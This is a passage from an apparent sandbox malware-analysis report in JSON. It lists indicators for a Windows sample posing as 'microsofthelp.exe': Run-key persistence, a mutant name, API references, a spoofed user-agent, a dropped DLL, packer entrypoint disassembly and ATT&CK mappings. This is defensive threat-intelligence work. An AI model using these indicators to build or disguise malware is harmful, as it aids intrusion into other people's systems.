00000000-00005864.00000000.66397.00401000.00000040.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 00000000-00005876.00000000.66474.00401000.00000040.mdmp\n 00000000-00005876.00000002.70318.00401000.00000040.mdmp\n \"Software\\motherFucker\" in Source: 00000000-00005876.00000000.66474.00401000.00000040.mdmp\n 00000000-00005876.00000002.70318.00401000.00000040.mdmp\n \"Software\\Policies\\Microsoft\\Internet Explorer\\Main\" in Source: 00000000-00005876.00000001.68396.00290000.00000004.mdmp\n 00000000-00005876.00000002.70318.00290000.00000004.mdmp\n 00000000-00005876.00000003.75760.00290000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"ShellExecuteExA\" (Indicator: \"ShellExecute\"; File: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API \"ShellExecuteExA\" (Indicator: \"ShellExecute\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API \"ShellExecuteExA\" (Indicator: \"ShellExecute\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API \"ShellExecuteExA\" (Indicator: \"ShellExecute\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"2564532002,5976,3139,,CreateProcessA,kernel32.dll,\"252:02:46.840\",RX=0,PX=0\" (Indicator: \"CreateProcess\"; Source: \"00000000-00005864.00000000.66404.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\pomdfghrt\"\n \"pomdfghrt\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"microsofthelp.exe.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\" file has an entrypoint instructions - \"pushal\t,call\t0x40d154,pop\teax,add\teax, 0x29f,mov\tesi, dword ptr [eax],add\tesi, eax,sub\teax, eax,mov\tedi, esi,lodsw\tax, word ptr [esi],shl\teax, 0xc,mov\tecx, eax,push\teax,lodsd\teax, dword ptr [esi],sub\tecx, eax,add\tesi, ecx,mov\tecx, eax,push\tedi,push\tecx,dec\tecx,mov\tal, byte ptr [ecx + edi + 6],mov\tbyte ptr [ecx + esi], al,jne\t0x40d173,mov\tedx, esi,mov\tecx, edi,call\t0x40d1e2,pop\tesi,pop\tedx,sub\teax, eax,mov\tdword ptr [edx + esi], eax,mov\tah, 0x10,sub\tedx, eax,sub\tecx, ecx,cmp\tecx, edx,jae\t0x40d1bd,mov\tebx, ecx,lodsb\tal, byte ptr [esi],inc\tecx,and\tal, 0xfe,cmp\tal, 0xe8,jne\t0x40d193,inc\tebx,add\tecx, 4,lodsd\teax, dword ptr [esi],or\teax, eax,js\t0x40d1b0,cmp\teax, edx,jae\t0x40d193,jmp\t0x40d1b6,add\teax, ebx,\"\n \"microsofthelp.exe.bin\" file has an entrypoint instructions - \"pushal\t,call\t0x40d154,pop\teax,add\teax, 0x29f,mov\tesi, dword ptr [eax],add\tesi, eax,sub\teax, eax,mov\tedi, esi,lodsw\tax, word ptr [esi],shl\teax, 0xc,mov\tecx, eax,push\teax,lodsd\teax, dword ptr [esi],sub\tecx, eax,add\tesi, ecx,mov\tecx, eax,push\tedi,push\tecx,dec\tecx,mov\tal, byte ptr [ecx + edi + 6],mov\tbyte ptr [ecx + esi], al,jne\t0x40d173,mov\tedx, esi,mov\tecx, edi,call\t0x40d1e2,pop\tesi,pop\tedx,sub\teax, eax,mov\tdword ptr [edx + esi], eax,mov\tah, 0x10,sub\tedx, eax,sub\tecx, ecx,cmp\tecx, edx,jae\t0x40d1bd,mov\tebx, ecx,lodsb\tal, byte ptr [esi],inc\tecx,and\tal, 0xfe,cmp\tal, 0xe8,jne\t0x40d193,inc\tebx,add\tecx, 4,lodsd\teax, dword ptr [esi],or\teax, eax,js\t0x40d1b0,cmp\teax, edx,jae\t0x40d193,jmp\t0x40d1b6,add\teax, ebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "stream-108", "type": 1, "relevance": 3, "name": "Contains ability to dynamically load libraries", "description": "LoadLibraryA@KERNEL32.DLL at 00000000-00005864-31702-12-00401510\n LoadLibraryA@KERNEL32.DLL at 00000000-00005864-31702-3-00401D30\n LoadLibraryA@KERNEL32.DLL at 00000000-00005864-31702-97-00403615\n LoadLibraryA@KERNEL32.DLL at 00000000-00005876-33596-97-00403615\n LoadLibraryA@KERNEL32.DLL at 00000000-00005876-33596-12-00401510\n LoadLibraryA@KERNEL32.DLL at 00000000-00005876-33596-3-00401D30\n LoadLibraryA@KERNEL32.DLL at 00000000-00001224-36783-3-00401D30\n LoadLibraryA@KERNEL32.DLL at 00000000-00001224-36783-97-00403615\n LoadLibraryA@KERNEL32.DLL at 00000000-00001224-36783-12-00401510", "origin": "Hybrid Analysis Technology", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"RegOpenKeyA\"; File: \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\")\n Found reference to API (Indicator: \"wsprintfA\"; File: \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\")\n Found reference to API (Indicator: \"InternetOpenA\"; File: \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\")\n Found reference to API (Indicator: \"GetAdaptersInfo\"; File: \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\")\n Found reference to API (Indicator: \"MessageBoxA\"; File: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetActiveWindow\"; File: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; File: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"ShellExecuteExA\"; File: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"VirtualProtect\"; File: \"00000000-00005876.00000002.70318.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetActiveWindow\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"MessageBoxA\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"ShellExecuteExA\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"VirtualAlloc\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"VirtualFree\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"VirtualProtect\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyA\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetAdaptersInfo\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"InternetOpenA\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"wsprintfA\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetActiveWindow\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"MessageBoxA\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"ShellExecuteExA\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp, 00000000-00005864.00000000.66404.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"VirtualFree\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"VirtualProtect\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp, 00000000-00005864.00000000.66404.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyA\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp, 00000000-00005864.00000000.66404.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetAdaptersInfo\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp, 00000000-00005864.00000000.66404.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"InternetOpenA\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp, 00000000-00005864.00000000.66404.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"wsprintfA\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp, 00000000-00005864.00000000.66404.00270000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetActiveWindow\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"MessageBoxA\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"ShellExecuteExA\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"VirtualFree\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"VirtualProtect\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyA\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetAdaptersInfo\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"InternetOpenA\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"wsprintfA\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-127", "type": 2, "relevance": 1, "name": "Found user-agent related strings", "description": "Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; CIBA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\" (Indicator: \"mozilla/4.0 (\"; File: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; CIBA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; CIBA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; CIBA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\HidePlugin.dll\" [Source: 00000000-00005876-00000C28-58609270]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-170", "type": 2, "relevance": 1, "name": "Possibly uses system binaries (Windows LOLbins)", "description": "Observed system executable string:\"%WINDIR%\\microsofthelp.exe\" [Source: 00000000-00005864-00000BC1-51064615]", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70cb0000\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" loaded module \"KERNEL32\" at base 77590000\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc70000\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75920000\n \"microsofthelp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70cb0000\n \"microsofthelp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"microsofthelp.exe\" loaded module \"KERNEL32\" at base 77590000\n \"microsofthelp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"microsofthelp.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc70000\n \"microsofthelp.exe\" loaded module \"%WINDIR%\\HIDEPLUGIN.DLL\" at base 0\n \"microsofthelp.exe\" loaded module \"SECUR32.DLL\" at base 757a0000\n \"microsofthelp.exe\" loaded module \"RPCRT4.DLL\" at base 77670000\n \"microsofthelp.exe\" loaded module \"SHELL32.DLL\" at base 75eb0000\n \"microsofthelp.exe\" loaded module \"OLE32.DLL\" at base 77a10000\n \"microsofthelp.exe\" loaded module \"ADVAPI32.DLL\" at base 75de0000\n \"microsofthelp.exe\" loaded module \"PROFAPI.DLL\" at base 75a90000\n \"microsofthelp.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 71c60000\n \"microsofthelp.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75b40000\n \"microsofthelp.exe\" loaded module \"WS2_32.DLL\" at base 774b0000\n \"microsofthelp.exe\" loaded module \"WINHTTP.DLL\" at base 716f0000\n \"microsofthelp.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75440000\n \"microsofthelp.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 75430000\n \"microsofthelp.exe\" loaded module \"IPHLPAPI.DLL\" at base 73dd0000\n \"microsofthelp.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bcd0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005864)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter 